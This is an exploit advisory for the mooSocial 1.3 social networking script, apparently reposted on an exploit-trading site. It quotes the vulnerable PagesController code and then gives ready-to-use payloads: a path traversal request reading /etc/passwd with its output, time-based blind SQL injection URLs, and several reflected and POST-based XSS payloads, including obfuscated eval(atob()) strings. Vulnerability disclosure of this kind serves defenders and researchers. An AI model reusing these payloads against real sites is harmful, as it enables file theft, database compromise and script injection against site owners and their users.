0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
mooSocial 1.3 Cross Site Scripting / Local File Inclusion Vulnerability
[###########################################################################################
#Exploit Title: mooSocial 1.3 - Multiple Vulnerabilites
#Official site: http://www.moosocial.com
#Risk Level: High
#Demo : http://demo.moosocial.com
#Exploit Author: Esac
#Homepage author : www.iss4m.ma
#Last Checked: 22/08/2013
###########################################################################################
+----------+
| OVERVIEW |
+----------+
mooSocial is a social networking script built on top of CakePHP 2 framework. It has all the features to build a successful community (e.g. blog, photo, group, event, video, topic...).
mooSocial is a premium version {
Standard Version : $149
Developer Version : $449
}
+-----------------------------------------------------------------------------------+
+----------------------------+
| Directorty Traversal / LFI |
+----------------------------+
mooSocial is vulnerable to a directory traversal / local file inclusion vulnerability , as a result, it was possible for an attacker to load webserver-readable files from the local filesystem (and to execute PHP stored on the server).
+--------------------+
| How did it work? |
+--------------------+
In the PHP code for de mooSocial website, there’s a controller called PagesController.php that is used to load static / semi-static pages. The exact name of the page to be loaded is determined by the query string: for example, http://www.demo.moosocial.com/pages/chat loads the Site chat page, which is stored as a template in the system.
i used Burp suite tool to intercept data cuz there is redirection here when we put something else after the root path
vuln code :
...................
class PagesController extends AppController
{
public function display()
{
$path = func_get_args();
$count = count($path);
if (!$count) {
$this->redirect('/');
}
$page = $subpage = $title_for_layout = null;
if (!empty($path[0])) {
$page = $path[0];
}
if (!empty($path[1])) {
$subpage = $path[1];
}
if (!empty($path[$count - 1])) {
$title_for_layout = Inflector::humanize($path[$count - 1]);
}
$this->set(compact('page', 'subpage', 'title_for_layout'));
// check if site is offline
$moo_setting = $this->_getSettings();
$uid = $this->Session->read('uid');
if ( !empty( $moo_setting['site_offline'] ) && !is_root_admin( $uid ) )
{
$this->layout = '';
$this->set('offline_message', $moo_setting['offline_message']);
$this->render('/Elements/misc/offline');
}
else
$this->render(implode('/', $path));
}
}
This code is vulnerable to a directory traversal attack: the $path, which is used to load a template, is directly tied to user input (the arguments to the function here are the elements of the query string). By sending URL slashes (/), it was possible to break out of the current directory and traverse via a relative path to any directory in the system. It was also possible to convince CakePHP (the framework used here) to load files without the ctp file extension associated with templates by including a URL null byte (%00) at the end of the URL.
+------------------+
| PROOF OF CONCEPT |
+------------------+
http://demo.moosocial.com/pages/../../../../../../../../../../etc/passwd%00
Requet Headers :
GET /pages/../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: demo.moosocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response Headers :
HTTP/1.1 404 Not Found
Date: Thu, 22 Aug 2013 04:56:29 GMT
Server: Apache
Set-Cookie: CAKEPHP=r7t684gq0po1spmqpp5634p2l3; expires=Thu, 22-Aug-2013 05:26:29 GMT; path=/
Content-Length: 37338
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Response Raw :
//source code of the page
.........................
root:x:0:0::/ramdisk/root:/ramdisk/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
........................
+--------------------------------+
| Time-Based Blind Injection |
+--------------------------------+
http://demo.moosocial.com/blogs/view/{Inject here}
Real exploitation :
http://demo.moosocial.com/blogs/view/1 and sleep(2)
==> will pause for 2 seconds and diplay the page after
http://demo.moosocial.com/blogs/view/1 and sleep(10)
==> will pause for 10 seconds and diplay the page after
+-----+
| XSS |
+-----+
//all XSS tested on Mozila Firefox
http://demo.moosocial.com/tags/view/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://demo.moosocial.com/albums/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://demo.moosocial.com/blogs/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://demo.moosocial.com/topics/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://demo.moosocial.com/groups/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://demo.moosocial.com/videos/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
//The input is reflected inside <script> tag between single quotes
http://demo.moosocial.com/groups/view/10/video_id:'';!--'<XSS>=&{()}
http://demo.moosocial.com/groups/view/10/topic_id:'';!--'<XSS>=&{()}
XSS via Post method :
POST /videos/ajax_embed HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Cookie: CAKEPHP=u3e5q7ut90nhcg7ao1e9c8tni4; mooSocial[language]=Q2FrZQ%3D%3D.9%2F79; mooSocial[theme]=Q2FrZQ%3D%3D.%2FvHjC2hN; mooSocial[activity_feed]=Q2FrZQ%3D%3D.9%2Bb%2FFmVNBY8%3D
Host: demo.moosocial.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
source=youtube&source_id=" onmouseover=prompt(976681) bad="
+--------------------------------------------------------------------------------------+
Knowledge is not an Object , it's a flaw :)
Greetz : White Tarbouch TEAM - Cobra
WwW.Iss4m.Ma
./Issam IEBOUBEN Aka Esac
# 0day.today [2024-11-15] #